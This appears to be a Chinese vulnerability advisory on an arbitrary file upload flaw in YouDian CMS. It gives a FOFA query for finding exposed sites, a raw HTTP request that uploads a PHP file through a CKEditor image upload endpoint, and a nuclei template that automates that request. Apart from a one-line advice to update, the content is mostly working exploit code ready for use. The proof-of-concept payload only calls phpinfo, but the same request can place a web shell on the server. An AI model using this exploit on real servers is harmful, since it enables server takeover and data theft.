赞
踩
友点CMS存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件,获取服务器权限
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
名称 | 版本号 |
---|---|
- |
FOFA:app=“友点建站-CMS” && product=“友点建站-CMS”
POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Content-Length: 185 Accept: */* Accept-Encoding: gzip, deflate, br Connection: close Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2 --cadc403efc1ad12f5fcce44c172baad2 Content-Disposition: form-data; name="files"; filename="c.php" Content-Type: image/jpg <?php phpinfo();?> --cadc403efc1ad12f5fcce44c172baad2--
http://127.0.0.1/Public/image/uploads/1709524862134.php
nuclei脚本
id: YouDianCMS-upload info: name: YouDianCMS-upload author: test severity: info description: description reference: - https:// tags: tags http: - raw: - | POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept-Encoding: gzip, deflate, br Accept: */* Connection: close Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2 Host: {{Hostname}} Content-Length: 179 --cadc403efc1ad12f5fcce44c172baad2 Content-Disposition: form-data; name="files"; filename="c.php" Content-Type: image/jpg <?php phpinfo();?> --cadc403efc1ad12f5fcce44c172baad2-- matchers-condition: and matchers: - type: word part: body words: - - type: status status: - 200
更新到最新版本
https://mp.weixin.qq.com/s/oiNffCThHJsfLhePlZjTBA
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。